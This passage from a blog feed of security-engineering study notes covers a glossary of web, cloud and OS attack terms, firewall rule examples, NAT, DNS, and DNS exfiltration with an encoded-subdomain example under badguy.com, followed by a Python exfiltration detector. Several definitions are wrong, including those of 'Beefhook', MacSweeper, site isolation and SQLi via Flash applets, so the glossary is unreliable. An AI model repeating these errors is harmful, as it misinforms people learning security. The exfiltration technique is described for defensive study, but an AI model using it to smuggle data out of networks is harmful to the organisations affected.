<li><p><strong>HSTS:</strong> HSTS stands for HTTP Strict Transport Security and is a security policy that forces web browsers to only use encrypted HTTPS connections with a website that supports it. This helps to prevent eavesdropping, tampering, and man-in-the-middle attacks, as all data transmitted between the browser and the server is encrypted. HSTS is specified by the website in the form of a header sent in the HTTP response, indicating to the browser that it should only use HTTPS for all future requests to that domain.</p>
</li>
<li><p><strong>Cert transparency:</strong> Cert Transparency is a system that provides public transparency of SSL/TLS certificates issued by certificate authorities. It works by logging all SSL/TLS certificates issued by certificate authorities in publicly accessible logs, allowing anyone to verify the validity of the certificate. This helps to prevent certificate authority mis-issuance, which could result in fraudulent websites being granted valid SSL/TLS certificates. By checking the logs, users can verify that the certificate was indeed issued by a trusted certificate authority and has not been revoked or tampered with.</p>
</li>
<li><p><strong>HPKP:</strong> HTTP Public Key Pinning was a security feature that allowed a web server to specify a set of trusted public keys in an HTTP header. The browser would then only accept SSL/TLS certificates signed by one of these trusted keys. However, this feature has been deprecated by Google Chrome due to several security and privacy concerns.</p>
</li>
<li><p><strong>Cookies:</strong> Cookies are small text files that are stored on the client's computer by a website. They can be used to remember user preferences, store user data, or track user behavior on a website. By setting the "HttpOnly" attribute in the cookie, a website can indicate that the cookie should only be accessible by the server and not by JavaScript. This helps to prevent Cross-Site Scripting (XSS) attacks, as the attacker cannot access or steal the cookie data.</p>
</li>
<li><p><strong>CSRF:</strong> Cross-Site Request Forgery (CSRF) is a type of attack that allows an attacker to perform unauthorized actions on behalf of a victim, using their existing session. This can be done by tricking the victim into visiting a malicious website that sends a request to a vulnerable website, with the victim's cookies attached. The request will be executed as if it was made by the victim, leading to unintended consequences. To prevent CSRF, websites can implement various mitigation techniques, such as checking the origin of incoming requests or requiring a unique token to be submitted with each request.</p>
</li>
<li><p><strong>XSS:</strong> Cross-Site Scripting (XSS) is a type of security vulnerability that allows an attacker to inject malicious scripts into a web page viewed by other users. XSS attacks can take various forms, such as Reflected XSS, where the attacker's payload is immediately executed by the browser in response to a request, or Persistent XSS, where the malicious script is stored on the server and executed every time the page is viewed. There are also client-side XSS attacks, also known as DOM-based XSS, where the malicious script is executed directly by the browser without a request to the server.</p>
</li>
<li><p><strong>SQLi:</strong> SQL Injection (SQLi) is a type of attack that targets the database of a website by injecting malicious SQL commands into an input field, such as a search bar or a form. The attacker's goal is to manipulate the database and extract sensitive information, such as login credentials or personal data. SQLi attacks can also be performed through malicious software installed on the victim's computer, such as a person-in-the-browser (PITB) attack using a malicious Flash or Java applet. To prevent SQLi, websites must validate and sanitize user input and properly escape any special characters that might be used in an SQLi attack.</p>
</li>
<li><p><strong>POST:</strong> POST is one of the two main HTTP methods (the other being GET) used to send data from a client to a server. The POST method is typically used to submit form data, as it can transmit large amounts of data and is more secure than GET, as the data is not visible in the URL.</p>
</li>
<li><p><strong>GET:</strong> GET is the other main HTTP method used to retrieve data from a server. The GET method sends a request to the server with query parameters attached to the URL, which can be used to specify the data that should be returned. Unlike POST, the data sent with a GET request is visible in the URL and has a limit on the amount of data that can be sent.</p>
</li>
<li><p><strong>Directory traversal:</strong> Directory traversal, also known as path traversal, is a type of security vulnerability that allows an attacker to access files and directories on a server that they should not be able to see. This can be done by injecting ../ or ./ into a URL or a form field, which causes the server to traverse the file system to a different directory than intended. There are various tools available that automate directory traversal attacks.</p>
</li>
<li><p><strong>APIs:</strong> An API (Application Programming Interface) is a set of rules that allows different software systems to communicate with each other. APIs can return various types of information, such as data, images, or status codes, and can also receive data, such as parameters or authentication credentials. When working with APIs, it's important to understand what information they return and what data can be sent, as this can have security implications.</p>
</li>
<li><p><strong>Beefhook:</strong> Beefhook is a tool used to examine the behavior of Chrome extensions, including the data they access and the requests they make. This can be useful for security purposes, as it allows researchers and developers to identify potential security vulnerabilities in extensions.</p>
</li>
<li><p><strong>User agents:</strong> A user agent is a string sent by a client to a server that identifies the type of client and the software used. The user agent can be used to determine if the client is a legitimate browser or a bot, as bots typically have unique user agents that can be easily recognized.</p>
</li>
<li><p><strong>Browser extension take-overs:</strong> A browser extension take-over occurs when an attacker can install a malicious extension in a browser, either by exploiting a security vulnerability or by tricking the user into installing it. Malicious extensions can perform various malicious activities, such as mining cryptocurrency, stealing login credentials, or displaying unwanted ads.</p>
</li>
<li><p><strong>Local file inclusion:</strong> Local file inclusion (LFI) is a type of security vulnerability that allows an attacker to include and execute local files on the server. This can be done by injecting malicious file paths into a URL or a form field, allowing the attacker to execute arbitrary code on the server.</p>
</li>
<li><p><strong>Remote file inclusion (RFI):</strong> Remote file inclusion (RFI) is a type of security vulnerability that allows an attacker to include and execute remote files on the server. This can be done by injecting a URL into a form field or a parameter, causing the server to retrieve and execute the remote file. RFI attacks are less common these days due to improved security measures and the decline in popularity of certain programming languages, such as PHP.</p>
</li>
<li><p><strong>SSRF:</strong> Server-Side Request Forgery (SSRF) is a type of security vulnerability that allows an attacker to send a malicious request from a vulnerable server to another server. This can be used to access restricted resources on the target server, such as internal network resources or local files.</p>
</li>
<li><p><strong>Web vulnerability scanners:</strong> Web vulnerability scanners are tools that automate the process of identifying security vulnerabilities in web applications. These tools can identify a wide range of security issues, including SQL injection, cross-site scripting (XSS), and cross-site request forgery (CSRF).</p>
</li>
<li><p><strong>SQLmap:</strong> SQLmap is an open-source tool used to automate the process of detecting and exploiting SQL injection vulnerabilities in web applications. It can be used to retrieve data from databases, execute arbitrary SQL commands, and even take full control of the underlying server.</p>
</li>
<li><p><strong>Malicious redirects:</strong> A malicious redirect is a type of attack in which a user is redirected to a different website without their knowledge or consent. This can be done by injecting malicious code into a vulnerable website or by using a phishing technique, such as a fake login page. Malicious redirects can be used to steal sensitive information, such as login credentials, or to distribute malware.</p>
</li>
</ul>
<h3 id="heading-infrastructure-prod-cloud-virtualisation">Infrastructure (Prod / Cloud) Virtualisation:</h3>
<blockquote>
<p>Infrastructure (Prod / Cloud) Virtualisation is the process of creating and managing virtual versions of physical resources, such as servers, storage, and networking. This technology enables multiple virtual systems to run on a single physical host, increasing efficiency, scalability, and security.</p>
<p>Cloud virtualization specifically refers to virtualization in cloud computing environments, where cloud providers offer virtual resources as a service over the internet. This allows organizations to run their applications and store their data in virtual environments provided by the cloud provider, rather than on physical hardware they own and maintain.</p>
</blockquote>
<ul>
<li><p><strong>Hypervisors:</strong> A hypervisor is a type of virtualization technology that allows multiple virtual machines (VMs) to run on a single physical host. The hypervisor provides a layer of abstraction between the physical host and the virtual machines, allowing each VM to run its operating system and applications independently.</p>
</li>
<li><p><strong>Hyperjacking:</strong> Hyperjacking refers to the act of compromising a hypervisor and gaining unauthorized access to its virtual machines. This type of attack can allow an attacker to steal sensitive information or compromise multiple VMs at once.</p>
</li>
<li><p><strong>Containers, VMs, clusters:</strong> Containers, virtual machines (VMs), and clusters are different types of virtualization technologies. Containers are a lightweight form of virtualization that provide isolation between applications without the overhead of a full virtual machine. VMs are a traditional form of virtualization that allows multiple operating systems to run on a single physical host. Clusters are a group of interconnected VMs that work together to provide high availability and scalability.</p>
</li>
<li><p><strong>Escaping techniques:</strong> Escaping techniques refer to methods used by attackers to escape from a virtualized environment and access the underlying physical host. This can be used to steal sensitive information or compromise the host system.</p>
</li>
<li><p><strong>Lateral movement and privilege escalation techniques:</strong> Lateral movement and privilege escalation are tactics used by attackers to move from one system to another and gain elevated privileges. In cloud environments, cloud service accounts can be used for lateral movement and privilege escalation. GCPloit is a tool for exploiting vulnerabilities in Google Cloud Projects.</p>
</li>
<li><p><strong>Site isolation:</strong> Site isolation is a security technique that separates different parts of a website into separate sandboxes. This helps to prevent cross-site scripting (XSS) and other types of attacks that could allow an attacker to access sensitive information.</p>
</li>
<li><p><strong>Side-channel attacks:</strong> Side-channel attacks refer to attacks that exploit information that is leaked through the side channels of a system, such as power consumption or electromagnetic radiation. Spectre and Meltdown are examples of side-channel attacks that exploit weaknesses in modern processors.</p>
</li>
<li><p><strong>BeyondCorp:</strong> BeyondCorp is a security model that is designed to trust the device (such as a laptop or smartphone) but not the network. This allows organizations to provide secure access to resources from anywhere, without the need for a traditional VPN.</p>
</li>
<li><p><strong>Log4j vulnerability:</strong> The Log4j vulnerability is a security vulnerability in the Log4j logging framework that can be exploited by attackers to inject malicious code into Java applications. This vulnerability can lead to remote code execution, data theft, and other types of attacks.</p>
</li>
</ul>
<h3 id="heading-os-implementation-and-systems">OS Implementation and Systems:</h3>
<ul>
<li><p>OS Implementation and Systems refer to how an operating system is implemented and the various systems and components that make it up.</p>
<p>  <strong>Privilege escalation techniques:</strong> Techniques used by attackers to increase their level of access and control over a system, such as exploiting vulnerabilities, misconfigurations, or weak passwords.</p>
<p>  <strong>Buffer Overflows:</strong> A type of software vulnerability where an attacker can cause a program to crash or execute unintended code by sending more data to a buffer than it can handle.</p>
<p>  <strong>Directory traversal:</strong> An attack where an attacker manipulates file paths in a request to access files and directories that are outside of the intended directory structure.</p>
<p>  <strong>Remote Code Execution:</strong> A type of attack where an attacker can execute arbitrary code on a remote system. This is often achieved through exploiting software vulnerabilities or weak configurations.</p>
<p>  <strong>Local databases:</strong> Databases that are stored locally on a device, rather than on a remote server. For example, some messaging apps use SQLite for storing messages.</p>
<p>  <strong>Windows:</strong> A popular operating system used by many organizations and individuals.</p>
<p>  <strong>Windows registry:</strong> A database that stores configuration settings and options for the Windows operating system and its applications.</p>
<p>  <strong>Group Policy:</strong> A feature in Windows that allows administrators to set policies for users and computers in an Active Directory environment.</p>
<p>  <strong>Active Directory (AD):</strong> A centralized database used by Windows to store user, computer, and network information.</p>
<p>  <strong>Bloodhound tool:</strong> A tool used to visualize and analyze the relationships and privileges within an Active Directory environment.</p>
<p>  <strong>Kerberos authentication with AD:</strong> A network authentication protocol used by Windows to provide secure authentication over unsecured networks.</p>
<p>  <strong>Windows SMB:</strong> The Server Message Block protocol used by Windows for file and print sharing.</p>
<p>  <strong>Samba:</strong> A free, open-source implementation of the SMB protocol that allows non-Windows systems to share files and printers with Windows systems.</p>
<p>  <strong>ROP:</strong> Return-Oriented Programming, a type of attack that exploits buffer overflows by chaining together small fragments of code, rather than injecting new code into a buffer.</p>
</li>
<li><p><strong>*nix</strong> refers to Unix-like operating systems, including Linux and Unix.</p>
<p>  SELinux is a security extension for Linux, which provides mandatory access control policies to the operating system.</p>
<p>  The kernel in *nix operating systems is the central component of the operating system that manages system resources and communicates with the hardware. Userspace is the portion of the operating system where applications and user-level processes run. Permissions are used to control access to resources in *nix systems, such as files and directories.</p>
<p>  <strong>MAC (Mandatory Access Control)</strong> is a type of access control where the system enforces rules for accessing resources, whereas DAC (Discretionary Access Control) allows users to set their own access rules for resources.</p>
<p>  /proc is a virtual file system in *nix operating systems, which provides information about system processes. /tmp is a directory in *nix operating systems used for the temporary storage of files, and code can be saved and executed from there. /shadow contains encrypted passwords for user accounts.</p>
<p>  <strong>LDAP (Lightweight Directory Access Protocol)</strong> is a protocol used for accessing and maintaining directory information services over an Internet Protocol network. It allows users to have a single password for multiple services, similar to Active Directory in Windows.</p>
<p>  <strong>MacOS</strong> is an operating system for Apple Macintosh computers. The Gotofail error was a bug in the SSL/TLS cryptographic software library in MacOS, which allowed attackers to intercept secure communications between two parties. MacSweeper was a software tool used for cleaning up junk files on MacOS. Researching Mac vulnerabilities involves identifying security weaknesses and flaws in the MacOS operating system and finding ways to fix them.</p>
</li>
</ul>
]]></content:encoded></item><item><title><![CDATA[Security engineering  basing on gracenolan notes. part 2]]></title><description><![CDATA[Welcome back. let's seize the moment!

Let's look at firewalls.
What are firewalls?

A firewall is a network security system that monitors and controls the incoming and outgoing network traffic based on predetermined security rules and policies. The ...]]></description><link>https://blog.oscakampala.org/security-engineering-basing-on-gracenolan-notes-part-2</link><guid isPermaLink="true">https://blog.oscakampala.org/security-engineering-basing-on-gracenolan-notes-part-2</guid><category><![CDATA[notes]]></category><category><![CDATA[#cybersecurity]]></category><category><![CDATA[CyberSec]]></category><category><![CDATA[Security]]></category><category><![CDATA[hacking]]></category><dc:creator><![CDATA[WarrenMu]]></dc:creator><pubDate>Thu, 26 Jan 2023 19:59:01 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1674740039025/0ad9d852-797a-4ec9-8a52-aa1c6061c28f.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<blockquote>
<p>Welcome back. Let's seize the moment!</p>
</blockquote>
<p>Let's look at firewalls.</p>
<h3 id="heading-what-are-firewalls"><strong>What are firewalls?</strong></h3>
<ul>
<li>A firewall is a network security system that monitors and controls the incoming and outgoing network traffic based on predetermined security rules and policies. The main purpose of a firewall is to prevent unauthorized access to or from a private network and to block malicious or unwanted traffic. Firewalls can be hardware-based or software-based and are commonly used to protect networks connected to the internet.</li>
</ul>
<p><strong>Rules to prevent incoming and outgoing connections:</strong></p>
<p>Firewall rules are used to control incoming and outgoing network traffic based on predefined criteria such as IP address, port number, protocol, and other parameters. These rules can be used to:</p>
<ul>
<li><p>Block incoming traffic from certain IP addresses or ranges.</p>
</li>
<li><p>Allow incoming traffic only from specific IP addresses or ranges.</p>
</li>
<li><p>Block incoming traffic on certain ports.</p>
</li>
<li><p>Allow incoming traffic only on specific ports.</p>
</li>
<li><p>Block outgoing traffic to certain IP addresses or ranges.</p>
</li>
<li><p>Allow outgoing traffic only to specific IP addresses or ranges.</p>
</li>
<li><p>Block outgoing traffic on certain ports.</p>
</li>
<li><p>Allow outgoing traffic only on specific ports.</p>
</li>
<li><p>Inspect and filter traffic based on protocol, such as HTTP or HTTPS.</p>
</li>
<li><p>Inspect and filter traffic based on application layer data, such as file types or keywords.</p>
<p>  The rules are applied to the firewall in a specific order, and the firewall evaluates each packet of incoming and outgoing network traffic against the rules in that order. If a packet matches one of the rules, the firewall will take the action specified in that rule, such as allowing or blocking the traffic.</p>
</li>
</ul>
<p>The specific code for configuring firewall rules will depend on the software or hardware firewall you are using. Here are some examples of firewall rule configurations for different platforms:</p>
<p><strong>IPTables (Linux):</strong></p>
<pre><code class="lang-bash">iptables -A INPUT -s 192.168.1.0/24 -j DROP
</code></pre>
<p>This command will block all incoming traffic from the IP address range 192.168.1.0 to 192.168.1.255.</p>
<pre><code class="lang-bash">iptables -A OUTPUT -d 10.0.0.0/8 -j DROP
</code></pre>
<p>This command will block all outgoing traffic to the IP address range 10.0.0.0 to 10.255.255.255.</p>
<p><strong>Windows Firewall (Windows):</strong></p>
<pre><code class="lang-bash">netsh advfirewall firewall add rule name=<span class="hljs-string">"Block incoming traffic from 192.168.1.0/24"</span> dir=<span class="hljs-keyword">in</span> remoteip=192.168.1.0/24 action=block
</code></pre>
<p>This command will block all incoming traffic from the IP address range 192.168.1.0 to 192.168.1.255.</p>
<pre><code class="lang-bash">netsh advfirewall firewall add rule name=<span class="hljs-string">"Allow outgoing traffic to 10.0.0.0/8"</span> dir=out remoteip=10.0.0.0/8 action=allow
</code></pre>
<p>This command will allow all outgoing traffic to the IP address range 10.0.0.0 to 10.255.255.255.</p>
<p><strong>pf (FreeBSD, OpenBSD):</strong></p>
<pre><code class="lang-bash">block <span class="hljs-keyword">in</span> quick on <span class="hljs-variable">$ext_if</span> from 192.168.1.0/24
</code></pre>
<p>This rule will block all incoming traffic from the IP address range 192.168.1.0 to 192.168.1.255.</p>
<pre><code class="lang-bash">block out quick on <span class="hljs-variable">$ext_if</span> to 10.0.0.0/8
</code></pre>
<p>This rule will block all outgoing traffic to the IP address range 10.0.0.0 to 10.255.255.255.</p>
<p><strong>Note:</strong></p>
<blockquote>
<p>Please note that the above commands are examples and might not work in your specific environment.</p>
</blockquote>
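<p>Because rules are evaluated in order and the first match decides, a rule appended after a broader one (iptables -A adds to the end of the chain) may never take effect. The following added example, which is not code from the original notes, models first-match evaluation and reports such shadowed rules; the ruleset, the default policy and all function names are assumptions made for the illustration.</p>

```python
"""First-match evaluation of an ordered ruleset, plus a check for shadowed rules."""
import ipaddress
from collections import namedtuple

Rule = namedtuple("Rule", "chain network action")


def rule(chain, cidr, action):
    """Build a Rule from a chain name, a CIDR string and an action."""
    return Rule(chain, ipaddress.ip_network(cidr), action)


# Constructed ruleset in evaluation order. The first two entries mirror the
# iptables examples in the text; the rest are made up for this illustration.
RULES = [
    rule("INPUT", "192.168.1.0/24", "DROP"),
    rule("OUTPUT", "10.0.0.0/8", "DROP"),
    rule("INPUT", "192.168.1.10/32", "ACCEPT"),  # intended exception, appended too late
    rule("OUTPUT", "10.1.0.0/16", "DROP"),       # already covered by the /8 rule
    rule("INPUT", "203.0.113.0/24", "ACCEPT"),
]


def evaluate(rules, chain, address, default="ACCEPT"):
    """Return the action of the first rule that matches `address` on `chain`.

    For INPUT the address is the packet's source, for OUTPUT its destination,
    matching the -s / -d options used in the text. `default` stands in for
    the chain policy (an assumption here).
    """
    ip = ipaddress.ip_address(address)
    for r in rules:
        if r.chain == chain and ip.version == r.network.version and ip in r.network:
            return r.action
    return default


def find_shadowed(rules):
    """Return (index, shadowed_by, kind) for rules that can never be reached.

    A rule is shadowed when an earlier rule on the same chain covers its whole
    address range. "conflict" means the two actions differ, so the later rule's
    intent is silently lost; "redundant" means they agree.
    """
    findings = []
    for j, later in enumerate(rules):
        for i in range(j):
            earlier = rules[i]
            same_scope = (
                earlier.chain == later.chain
                and earlier.network.version == later.network.version
            )
            if same_scope and later.network.subnet_of(earlier.network):
                kind = "redundant" if earlier.action == later.action else "conflict"
                findings.append((j, i, kind))
                break
    return findings


if __name__ == "__main__":
    # The exception for 192.168.1.10 is never reached: the /24 DROP matches first.
    print("192.168.1.10 on INPUT:", evaluate(RULES, "INPUT", "192.168.1.10"))
    for index, by, kind in find_shadowed(RULES):
        print(f"rule {index} is shadowed by rule {by} ({kind})")

    # Moving the specific rule ahead of the broad one restores the intent.
    fixed = [RULES[2]] + RULES[:2] + RULES[3:]
    print("after reordering:", evaluate(fixed, "INPUT", "192.168.1.10"))
```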
<p>That's it for firewalls. Let's dive into NAT (Network Address Translation).</p>
<h3 id="heading-nat-network-address-translation"><strong>NAT (Network Address Translation):</strong></h3>
<ul>
<li><p>is a method of remapping one IP address space into another by modifying network address information in the IP header of packets while they are in transit across a traffic routing device. The technique was originally used for ease of rerouting traffic in IP networks without readdressing every host.</p>
</li>
<li><p>NAT operates on a router, usually connecting two networks, and translates the private (not globally unique) addresses in the internal network into legal addresses, e.g. Internet Protocol (IP) addresses, on the external network (the Internet). This allows computers on a private network to communicate with the Internet as if they had a globally unique IP address, while still maintaining the benefits of a private network (for example, security, addressing, and so on).</p>
</li>
<li><p>NAT is typically used to allow multiple hosts on a private network to access the Internet using a single public IP address, which is typically assigned by an Internet Service Provider (ISP) to the router. This is often used in home and small office networks, where obtaining a block of public IP addresses would be impractical or too costly.</p>
</li>
<li><p>NAT can also be used for other purposes, such as load balancing or connecting multiple networks. Additionally, NAT can be implemented on a host, rather than a router, allowing a single host to communicate with the Internet using a different IP address than its own.</p>
</li>
<li><p>IPv4 and IPv6 are the two versions of Internet Protocol (IP) in use today.</p>
<p>  IPv4, the first version of IP, was first implemented in the early 1980s and has a 32-bit address space, which allows for a total of about 4.3 billion unique addresses. This address space is rapidly being exhausted as more and more devices are connected to the Internet. To solve this problem, IPv6 was developed, which has a 128-bit address space, allowing for a total of about 3.4 x 10^38 unique addresses.</p>
</li>
<li><p>One of the main differences between IPv4 and IPv6 is the size of the addresses. IPv4 addresses are 32 bits long, written in dot-decimal notation (for example, 192.168.1.1), while IPv6 addresses are 128 bits long, written in hexadecimal notation (for example, 2001:0db8:85a3:0000:0000:8a2e:0370:7334).</p>
</li>
<li><p>This larger address space in IPv6 allows for many more unique addresses and eliminates the need for NAT (Network Address Translation) which is used to map multiple private IP addresses to a single public IP address.</p>
<p>  Another difference is that IPv6 uses a simplified header format compared to IPv4. This allows for faster packet processing and more efficient routing. IPv6 also has built-in support for IPsec (Internet Protocol Security), which is an optional feature in IPv4. IPv6 also includes support for multicast (one-to-many) and anycast (one-to-nearest) addressing, which allows for more efficient communication in certain situations.</p>
</li>
<li><p>In summary, IPv4 and IPv6 are different versions of the Internet Protocol. IPv4 is the first version and has a 32-bit address space, which is becoming scarce; IPv6 was developed as a solution to this problem, with a 128-bit address space, a simplified header format and built-in support for IPsec, multicast and anycast addressing.</p>
</li>
</ul>
<h3 id="heading-dns"><strong>DNS:</strong></h3>
<ul>
<li><p>DNS (Domain Name System) is a hierarchical, decentralized system for naming and addressing Internet resources. It is used to translate human-friendly domain names, such as <a target="_blank" href="http://www.example.com">www.example.com</a>, into IP addresses that machines can understand, such as 192.0.2.1. This makes it easier for users to access Internet resources, as they can remember and type in domain names instead of IP addresses.</p>
</li>
<li><p>DNS is organized into a hierarchical tree-like structure, with the root of the tree at the top. The root is the highest-level domain and is not associated with any specific organization or country. It has a number of top-level domains (TLDs) such as .com, .org, .edu, .gov, and country-code TLDs (ccTLDs) such as .us, .uk, .fr, etc. Each TLD is managed by a separate organization, known as a registry.</p>
</li>
<li><p>Underneath the TLDs, there are second-level domains, such as <a target="_blank" href="http://example.com">example.com</a>. These are typically registered by organizations or individuals and can be further divided into subdomains, such as <a target="_blank" href="http://www.example.com">www.example.com</a>.</p>
<p>  The process of resolving a domain name to an IP address is handled by DNS servers, which are responsible for maintaining a database of domain names and their corresponding IP addresses. When a user requests a specific domain name, their computer sends a query to a DNS server, which then looks up the IP address associated with that domain name and returns it to the user's computer.</p>
</li>
<li><p>DNS is a critical infrastructure for the internet and it's usually used for name resolution for websites, email and other services. Without DNS, users would have to manually enter IP addresses every time they wanted to access a website or other online resource, which would be impractical and time-consuming.</p>
</li>
</ul>
<p><strong>(53):</strong></p>
<ul>
<li><p>The number 53 refers to the port number used by the Domain Name System (DNS) protocol. DNS uses the User Datagram Protocol (UDP) on port 53 to serve DNS queries. When a computer needs to resolve a hostname to an IP address, it sends a DNS query to a DNS server on port 53. The DNS server then responds with the requested IP address or with a referral to another DNS server that may have more information.</p>
</li>
<li><p>Port 53 is a well-known port, which means it is a registered port that is commonly used by DNS. As such, firewalls and other security devices are often configured to allow traffic to and from this port.</p>
</li>
<li><p>It's important to note that DNS can also use TCP port 53 when the response size is too large to fit in a single UDP packet and the client supports TCP.</p>
<p>  Since DNS is a fundamental infrastructure for the internet, it is important to have DNS servers running on port 53, to ensure that domain names can be resolved to IP addresses and internet services can be accessed.</p>
</li>
</ul>
<p><strong>Note:</strong></p>
<blockquote>
<p><strong>Requests to DNS are usually UDP unless the server gives a redirect notice asking for a TCP connection. Look-up in the cache happens first. DNS exfiltration. Using raw IP addresses means no DNS logs, but there are HTTP logs. DNS sinkholes.</strong></p>
<p>DNS requests are usually sent using the User Datagram Protocol (UDP) on port 53, but in some cases, if the DNS server responds with a "Truncated" flag, indicating that the response is too large to fit in a single UDP packet, the client may switch to using the Transmission Control Protocol (TCP) on port 53 to continue the transaction.</p>
<p>When a DNS query is made, the client will first check its local cache to see if it already has the requested information. If the information is not in the cache, the client will send a query to a DNS server. The DNS server will then check its cache and, if necessary, will forward the query to other DNS servers until it gets a response.</p>
<p>DNS exfiltration is a technique used to covertly exfiltrate data from a network by encoding it in DNS queries and responses. This can be done by using a domain name that looks like a normal domain name but is controlled by the attacker. The attacker can then use this domain name to send and receive data in a way that is difficult to detect.</p>
<p>Using raw IP addresses instead of domain names to access websites or other online resources can help evade detection by DNS logs. However, it is important to note that there are other types of logs, such as HTTP logs, that can still be used to track activity.</p>
<p>DNS sinkholes, also known as blackholes, are a security measure used to block access to malicious or unwanted domain names by redirecting DNS queries for those domain names to a non-existent IP address. This effectively prevents the client from reaching the domain name and can be used to block access to phishing sites, malware-hosting sites, and other types of malicious domains.</p>
<p><strong>In a reverse DNS lookup, PTR might contain</strong> <a target="_blank" href="http://2.152.80.208.in-addr.arpa"><strong>2.152.80.208.in-addr.arpa</strong></a><strong>, which will map to 208.80.152.2. DNS lookups start at the end of the string and work backwards, which is why the IP address is backwards in PTR.</strong></p>
<p>A reverse DNS lookup, also known as a PTR (pointer) record lookup, is the process of looking up the hostname associated with a given IP address. The PTR record is used to map an IP address to a hostname and is stored in a special domain called <a target="_blank" href="http://in-addr.arpa">in-addr.arpa</a>.</p>
<p>In a reverse DNS lookup, the IP address is reversed and appended with "<a target="_blank" href="http://in-addr.arpa">in-addr.arpa</a>" to form the domain name used in the lookup. For example, a reverse DNS lookup for the IP address 208.80.152.2 would use the domain name <a target="_blank" href="http://2.152.80.208.in-addr.arpa">2.152.80.208.in-addr.arpa</a>.</p>
<p>The reason the IP address is reversed in PTR is because the <a target="_blank" href="http://in-addr.arpa">in-addr.arpa</a> domain is organized hierarchically, with the octets of the IP address being used to form the labels of the domain name in reverse order. This allows the DNS system to perform lookups in a hierarchical manner, starting at the root of the tree and working down to the specific PTR record.</p>
<p>It's important to note that not all IP addresses have a corresponding PTR record and a reverse DNS lookup may return a negative response.</p>
</blockquote>
<h3 id="heading-dns-exfiltration"><strong>DNS exfiltration:</strong></h3>
<ul>
<li><p>DNS exfiltration is a technique used to covertly exfiltrate data from a network by encoding it in DNS queries and responses. One way this can be done is by sending data as subdomains of a domain name controlled by the attacker. For example, an attacker could encode data in a subdomain such as <a target="_blank" href="http://26856485f6476a567567c6576e678.badguy.com">26856485f6476a567567c6576e678.badguy.com</a>. This can be difficult to detect as it does not show up in HTTP logs and may not be flagged as suspicious by security systems that are not specifically looking for this type of activity.</p>
</li>
<li><p>Another way to do this could be by using a domain name that looks like a normal domain name but is controlled by the attacker. The attacker can then use this domain name to send and receive data in a way that is difficult to detect.</p>
</li>
<li><p>It's important to note that DNS exfiltration is a highly advanced and sophisticated attack method that requires a deep understanding of the DNS protocol and the ability to encode and decode data in a way that is not easily detectable. The use of this method requires a lot of stealth, as it is a well-known technique used by attackers to evade detection.</p>
</li>
<li><p>It is important to have good security systems and monitoring in place to detect and prevent this type of attack, such as using software that can detect abnormal DNS traffic. Additionally, keeping the DNS servers and the software up-to-date and patching vulnerabilities promptly is also important.</p>
</li>
</ul>
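<p>One way to implement the monitoring for abnormal DNS traffic described above, as an added example that is not code from the original notes: it groups resolver log lines by parent domain and flags domains that combine many one-off subdomains, very long labels and a large volume of subdomain characters. The log format, the thresholds and the function names are assumptions made for the illustration.</p>

```python
"""Flag parent domains whose query names look like data carried in subdomains."""
from collections import defaultdict, namedtuple

# Constructed resolver log ("timestamp client qname qtype"), not real traffic.
# The first badguy.com name is the example from the text; the rest are made up.
SAMPLE_LOG = """\
2023-01-26T10:00:01Z 10.0.0.5 www.example.com A
2023-01-26T10:00:02Z 10.0.0.5 mail.example.com MX
2023-01-26T10:00:03Z 10.0.0.9 26856485f6476a567567c6576e678.badguy.com A
2023-01-26T10:00:04Z 10.0.0.9 7b9e1c04aa3d5f6e2b8c9d0e1f2a3b4.badguy.com A
2023-01-26T10:00:05Z 10.0.0.9 c41f0e9d8b7a6c5d4e3f2a1b0c9d8e7.badguy.com A
2023-01-26T10:00:06Z 10.0.0.5 www.example.com A
2023-01-26T10:00:07Z 10.0.0.7 cdn.images.example.org AAAA
2023-01-26T10:00:08Z 10.0.0.7 a1.cdn.example.net A
2023-01-26T10:00:09Z 10.0.0.7 a2.cdn.example.net A
2023-01-26T10:00:10Z 10.0.0.7 a3.cdn.example.net A
"""

# Thresholds are assumptions for this illustration; tune them on your own baseline.
MIN_UNIQUE_SUBDOMAINS = 3  # many one-off names under one parent domain
MIN_LONGEST_LABEL = 25     # host labels chosen by people are rarely this long
MIN_PAYLOAD_CHARS = 64     # total characters carried in distinct subdomains
MIN_SIGNALS = 2            # one signal alone (e.g. a busy CDN) is not enough

Finding = namedtuple(
    "Finding", "unique_subdomains longest_label payload_chars clients reasons"
)


def split_qname(qname):
    """Return (subdomain, parent), taking the last two labels as the parent.

    Assumption: a production version would use the Public Suffix List so that
    names under suffixes such as co.uk are grouped correctly.
    """
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def parse_log(text):
    """Yield (client_ip, qname) for each well-formed line; skip anything else."""
    for line in text.splitlines():
        fields = line.split()
        if len(fields) == 4:
            yield fields[1], fields[2]


def find_suspicious_parents(log_text):
    """Return {parent_domain: Finding} for domains that trip MIN_SIGNALS checks."""
    subdomains = defaultdict(set)
    clients = defaultdict(set)
    for client, qname in parse_log(log_text):
        sub, parent = split_qname(qname)
        if sub:
            subdomains[parent].add(sub)
            clients[parent].add(client)

    findings = {}
    for parent, names in subdomains.items():
        labels = [label for name in names for label in name.split(".")]
        unique = len(names)
        longest = max(len(label) for label in labels)
        payload = sum(len(label) for label in labels)

        reasons = []
        if unique >= MIN_UNIQUE_SUBDOMAINS:
            reasons.append(f"{unique} distinct subdomains")
        if longest >= MIN_LONGEST_LABEL:
            reasons.append(f"label of {longest} characters")
        if payload >= MIN_PAYLOAD_CHARS:
            reasons.append(f"{payload} subdomain characters in total")

        if len(reasons) >= MIN_SIGNALS:
            findings[parent] = Finding(
                unique, longest, payload, tuple(sorted(clients[parent])), reasons
            )
    return findings


if __name__ == "__main__":
    for parent, finding in find_suspicious_parents(SAMPLE_LOG).items():
        print(parent, "queried by", ", ".join(finding.clients))
        for reason in finding.reasons:
            print("  -", reason)
```

<p>The example.net names trip only the distinct-subdomain check, so they are not reported; requiring two signals keeps ordinary CDN-style naming out of the results.</p>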
<h3 id="heading-dns-configs"><strong>DNS configs:</strong></h3>
<ul>
<li><p>Start of Authority (SOA).</p>
</li>
<li><p>IP addresses (A and AAAA).</p>
</li>
<li><p>SMTP mail exchangers (MX).</p>
</li>
<li><p>Name servers (NS).</p>
</li>
<li><p>Pointers for reverse DNS lookups (PTR).</p>
</li>
<li><p>Domain name aliases (CNAME).</p>
</li>
</ul>
<p>These are several types of DNS configuration records that are used to configure and manage a domain name:</p>
<ol>
